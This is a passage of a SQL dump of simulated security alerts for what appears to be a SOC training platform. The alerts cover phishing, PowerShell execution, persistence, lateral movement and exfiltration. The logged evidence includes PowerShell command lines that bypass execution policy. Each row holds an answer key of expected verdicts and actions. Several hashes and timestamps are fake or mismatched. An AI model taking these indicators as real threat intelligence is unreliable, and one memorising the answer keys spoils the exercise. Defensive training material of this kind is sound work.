Reputation\",\"verdict\":\"suspicious\",\"details\":\"Spoofed email address\"}},{\"id\":\"artifact_6\",\"type\":\"filename\",\"value\":\"invoice_0923.docx\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Analysis\",\"verdict\":\"malicious\",\"details\":\"Contains macro with credential-stealing capabilities\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Beginner', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email Detected\",\"date\":\"2026-02-01T20:32:19.024Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(419, 'Malware Execution Alert', 'high', 'Endpoint Detection and Response (EDR)', 'The threat actors have successfully deployed malware on the compromised system to execute code that establishes a foothold within the network. This step follows the acquisition of valid credentials.', 'Execution', 'T1059.001 - PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-18T14:22:35Z\",\"event_type\":\"execution\",\"source\":\"EDR\",\"host_ip\":\"192.168.1.15\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\\\Temp\\\\malicious.ps1\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"username\":\"jdoe\",\"attacker_ip\":\"203.0.113.89\"}', '2026-01-04 04:13:57', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.89\",\"is_critical\":true,\"osint_result\":{\"source\":\"public_records\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address associated with previous attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Malware hash identified in multiple threat databases.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_analysis\",\"verdict\":\"malicious\",\"details\":\"Script used to establish foothold within the network.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_records\",\"verdict\":\"suspicious\",\"details\":\"User account used for unauthorized 
execution.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(420, 'Persistence Mechanism Detected', 'high', 'System Logs', 'A persistence mechanism associated with DarkSide has been detected, indicating an attempt to maintain access to the compromised system. The mechanism involves suspicious registry modifications and the presence of known malicious binaries.', 'Persistence', 'T1050 - New Service', 1, 'new', NULL, '{\"timestamp\":\"2023-10-21T14:32:45Z\",\"host_ip\":\"192.168.1.105\",\"user\":\"john_doe\",\"event_id\":7045,\"event_source\":\"Service Control Manager\",\"service_name\":\"DarkSideService\",\"service_path\":\"C:\\\\Windows\\\\System32\\\\darkside.exe\",\"md5_hash\":\"ae67f4c3d2b5e8a9f5b3d4f0e3a1c9d8\",\"attacker_ip\":\"203.0.113.45\",\"registry_change\":{\"key\":\"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"value_name\":\"DarkSideService\",\"value_data\":\"C:\\\\Windows\\\\System32\\\\darkside.exe\"}}', '2026-01-04 04:13:57', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP address used by DarkSide APT group.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"ae67f4c3d2b5e8a9f5b3d4f0e3a1c9d8\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus total\",\"verdict\":\"malicious\",\"details\":\"MD5 hash associated with DarkSide malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"darkside.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Executable linked to DarkSide 
operations.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"john_doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal logs\",\"verdict\":\"clean\",\"details\":\"User associated with the compromised system.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.026Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:32:45Z\\\",\\\"host_ip\\\":\\\"192.168.1.105\\\",\\\"user\\\":\\\"john_doe\\\",\\\"event_id\\\":7045,\\\"event_source\\\":\\\"Service Control Manager\\\",\\\"service_name\\\":\\\"DarkSideService\\\",\\\"service_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\darkside.exe\\\",\\\"md5_hash\\\":\\\"ae67f4c3d2b5e8a9f5b3d4f0e3a1c9d8\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"registry_change\\\":{\\\"key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"DarkSideService\\\",\\\"value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\darkside.exe\\\"}}\"},{\"timestamp\":\"2026-02-01T20:31:19.026Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:32:45Z\\\",\\\"host_ip\\\":\\\"192.168.1.105\\\",\\\"user\\\":\\\"john_doe\\\",\\\"event_id\\\":7045,\\\"event_source\\\":\\\"Service Control 
Manager\\\",\\\"service_name\\\":\\\"DarkSideService\\\",\\\"service_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\darkside.exe\\\",\\\"md5_hash\\\":\\\"ae67f4c3d2b5e8a9f5b3d4f0e3a1c9d8\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"registry_change\\\":{\\\"key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"DarkSideService\\\",\\\"value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\darkside.exe\\\"}}\"},{\"timestamp\":\"2026-02-01T20:30:19.026Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:32:45Z\\\",\\\"host_ip\\\":\\\"192.168.1.105\\\",\\\"user\\\":\\\"john_doe\\\",\\\"event_id\\\":7045,\\\"event_source\\\":\\\"Service Control Manager\\\",\\\"service_name\\\":\\\"DarkSideService\\\",\\\"service_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\darkside.exe\\\",\\\"md5_hash\\\":\\\"ae67f4c3d2b5e8a9f5b3d4f0e3a1c9d8\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"registry_change\\\":{\\\"key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"DarkSideService\\\",\\\"value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\darkside.exe\\\"}}\"},{\"timestamp\":\"2026-02-01T20:29:19.026Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:32:45Z\\\",\\\"host_ip\\\":\\\"192.168.1.105\\\",\\\"user\\\":\\\"john_doe\\\",\\\"event_id\\\":7045,\\\"event_source\\\":\\\"Service Control 
Manager\\\",\\\"service_name\\\":\\\"DarkSideService\\\",\\\"service_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\darkside.exe\\\",\\\"md5_hash\\\":\\\"ae67f4c3d2b5e8a9f5b3d4f0e3a1c9d8\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"registry_change\\\":{\\\"key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"DarkSideService\\\",\\\"value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\darkside.exe\\\"}}\"},{\"timestamp\":\"2026-02-01T20:28:19.026Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:32:45Z\\\",\\\"host_ip\\\":\\\"192.168.1.105\\\",\\\"user\\\":\\\"john_doe\\\",\\\"event_id\\\":7045,\\\"event_source\\\":\\\"Service Control Manager\\\",\\\"service_name\\\":\\\"DarkSideService\\\",\\\"service_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\darkside.exe\\\",\\\"md5_hash\\\":\\\"ae67f4c3d2b5e8a9f5b3d4f0e3a1c9d8\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"registry_change\\\":{\\\"key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"DarkSideService\\\",\\\"value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\darkside.exe\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(421, 'Unauthorized Admin Access', 'high', 'Network Traffic Analysis', 'The attackers use escalated privileges to move laterally within the network, targeting systems that control pipeline operations. Network logs indicate unauthorized login attempts to admin accounts from suspicious external IPs.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-14T07:45:22Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.5.12\",\"username\":\"admin_user\",\"success\":true,\"action\":\"login\",\"description\":\"Successful login using administrative credentials from external IP.\",\"alert\":\"Unauthorized Admin Access Detected\",\"hashes\":{\"sha256\":\"d2d2d2d2b2b2c2c2f2f2g2g2h2h2i2i2j2j2k2k2l2l2m2m2n2n2o2o2p2p2\"}}', '2026-01-04 04:13:57', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple malware campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal network IP.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"suspicious\",\"details\":\"Account used for unauthorized access.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d2d2d2d2b2b2c2c2f2f2g2g2h2h2i2i2j2j2k2k2l2l2m2m2n2n2o2o2p2p2\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified in connection with APT attacks.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(422, 'Data Exfiltration Attempt', 'high', 'Data Loss Prevention (DLP) Systems', 'In the final stage, DarkSide attempts to exfiltrate sensitive operational data, which could be used for ransom or sold on the black market. The DLP system detected an unauthorized data transfer to an external IP address.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"203.0.113.45\",\"user\":\"jdoe\",\"file_hash\":\"f3b9e2c6f8d3c2d7f8c3b3e5a5e6d7c8\",\"filename\":\"OperationalData_Backup.zip\",\"protocol\":\"HTTPS\",\"action\":\"blocked\",\"alert_id\":\"DLPS-5678-EXF\"}', '2026-01-04 04:13:57', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known IP address used by DarkSide for data exfiltration.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"f3b9e2c6f8d3c2d7f8c3b3e5a5e6d7c8\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with suspicious data exfiltration files.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"OperationalData_Backup.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Filename suggests sensitive data being exfiltrated.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"clean\",\"details\":\"User account potentially compromised for data 
exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.028Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_hash\\\":\\\"f3b9e2c6f8d3c2d7f8c3b3e5a5e6d7c8\\\",\\\"filename\\\":\\\"OperationalData_Backup.zip\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"DLPS-5678-EXF\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.028Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_hash\\\":\\\"f3b9e2c6f8d3c2d7f8c3b3e5a5e6d7c8\\\",\\\"filename\\\":\\\"OperationalData_Backup.zip\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"DLPS-5678-EXF\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.028Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_hash\\\":\\\"f3b9e2c6f8d3c2d7f8c3b3e5a5e6d7c8\\\",\\\"filename\\\":\\\"OperationalData_Backup.zip\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"DLPS-5678-EXF\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.028Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_hash\\\":\\\"f3b9e2c6f8d3c2d7f8c3b3e5a5e6d7c8\\\",\\\"filename\\\":\\\"OperationalData_Backup.zip\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"DLPS-5678-EXF\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.028Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_hash\\\":\\\"f3b9e2c6f8d3c2d7f8c3b3e5a5e6d7c8\\\",\\\"filename\\\":\\\"OperationalData_Backup.zip\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"DLPS-5678-EXF\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(423, 'Unusual Phishing Email Detected', 'medium', 'Email Gateway Logs', 'An employee received a phishing email with a malicious attachment, indicative of REvil\'s initial access strategy. The email originated from a suspicious IP and contained a known malicious file hash.', 'Initial Access', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-17T08:32:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.25\",\"sender_email\":\"attacker@maliciousdomain.com\",\"recipient_email\":\"j.doe@company.com\",\"subject\":\"Urgent: Action Required\",\"attachment\":{\"filename\":\"invoice_update.docm\",\"hash\":\"e99a18c428cb38d5f260853678922e03\"},\"user\":\"j.doe\",\"message_id\":\"<20231017083245.123456@maliciousdomain.com>\"}', '2026-01-04 04:25:30', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"attacker@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Email domain flagged for sending phishing emails.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known malicious document used by REvil.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"invoice_update.docm\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename pattern common in phishing attachments.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User 
Directory\",\"verdict\":\"internal\",\"details\":\"Internal employee targeted by phishing attempt.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Beginner', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"attacker@maliciousdomain.com\",\"to\":\"j.doe@company.com\",\"subject\":\"Urgent: Action Required\",\"date\":\"2026-02-01T20:32:19.029Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_update.docm\",\"size\":\"1.2MB\",\"type\":\"application/vnd.ms-word.document.macroEnabled.12\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(424, 'Suspicious PowerShell Script Execution', 'high', 'Endpoint Detection and Response (EDR) System', 'A PowerShell script was executed on the endpoint, potentially indicating malicious activity consistent with REvil ransomware tactics. The script was observed executing commands to download additional payloads from a known malicious IP.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T13:45:27Z\",\"event_id\":\"4688\",\"computer_name\":\"DESKTOP-3FQ7K9R\",\"user\":\"johndoe\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"command_line\":\"powershell -NoProfile -ExecutionPolicy Bypass -File C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\malicious_script.ps1\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"source_ip\":\"192.168.1.15\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":\"443\",\"filename\":\"malicious_script.ps1\"}', '2026-01-04 04:25:30', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with REvil ransomware\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareBazaar\",\"verdict\":\"malicious\",\"details\":\"Hash associated with REvil ransomware payload\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious_script.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual script execution in user temp directory\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"johndoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Known user account on the 
network\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"DESKTOP-3FQ7K9R\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"johndoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"johndoe\",\"cmd\":\"powershell -NoProfile -ExecutionPolicy Bypass -File C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\malicious_script.ps1\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"johndoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.45\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(425, 'Persistence Mechanism Established', 'high', 'Registry Changes Monitoring', 'The REvil ransomware has established persistence by modifying registry keys, ensuring they retain access after a system reboot. This action is indicative of a sophisticated attack aimed at maintaining long-term access to the compromised system.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T02:15:45Z\",\"event_id\":\"4657\",\"event_type\":\"Registry Change Detected\",\"host\":\"compromised-host.local\",\"user\":\"administrator\",\"ip_address\":\"192.168.1.10\",\"external_ip\":\"185.92.220.65\",\"registry_key\":\"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\maliciousApp\",\"registry_value\":\"C:\\\\ProgramData\\\\REvil\\\\malicious.exe\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"description\":\"Registry key modified to establish persistence by REvil malware.\"}', '2026-01-04 04:25:33', '2026-02-14 16:52:12', 